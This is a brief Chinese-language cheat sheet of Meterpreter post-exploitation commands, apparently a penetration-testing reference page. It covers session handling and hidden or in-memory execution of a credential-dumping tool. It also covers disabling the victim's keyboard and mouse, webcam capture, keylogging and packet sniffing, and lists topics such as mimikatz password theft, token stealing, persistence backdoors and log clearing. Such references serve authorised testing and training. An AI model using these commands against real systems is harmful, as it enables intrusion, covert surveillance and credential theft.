meterpreter
交互
CTRL+Z 把session放入后台
当攻击成功后会返回会话,使用session -l命令列出当前获取到的会话
>session -l
使用
>sessions -i id 来进入一个会话进行交互
>sessions -k id 杀死一个会话
>background 将当前会话放置后台
>sessions -x检查心跳
>sessions -u [ID] cmdshell升级meterpreter shell
>reboot / shutdown 重启/关机命令
>idletime 查看目标机闲置时间
>shell 进入目标cmdshell
>uictl [enable/disable] [keyboard/mouse/all] 开启或禁止键盘/鼠标
>uictl disable mouse 禁用鼠标
>uictl disable keyboard 禁用键盘
>webcam_list 查看摄像头
>webcam_snap 通过摄像头拍照
>webcam_stream 通过摄像头开启视频
>execute -H -i -f cmd.exe 执行cmd.exe,-H不可见,-i交互
>execute -H -m -d calc.exe -f wce.exe -a "-o 1.txt" 隐藏执行
>execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w 从内存执行
>ps 查看进程
>migrate pid 迁移进程
>kill pid #杀死进程
>screenshot 截图
>run 执行模块,2下tab列出
>run post/windows/capture/keylog_recorder 键盘记录
>run packetrecorder -li 列出接口
>run packetrecorder -i 1 监控接口文件操作
提权
后渗透&权限维持
查看信息ip和路由
端口转发
添加路由及进行扫描
Socks4a代理
mimikatz抓密码
开启RDP
sniffer抓包
incognito假冒令牌
steal_token窃取
hash
persistence启动项后门
metsvc
清理日志
最后更新于
这有帮助吗?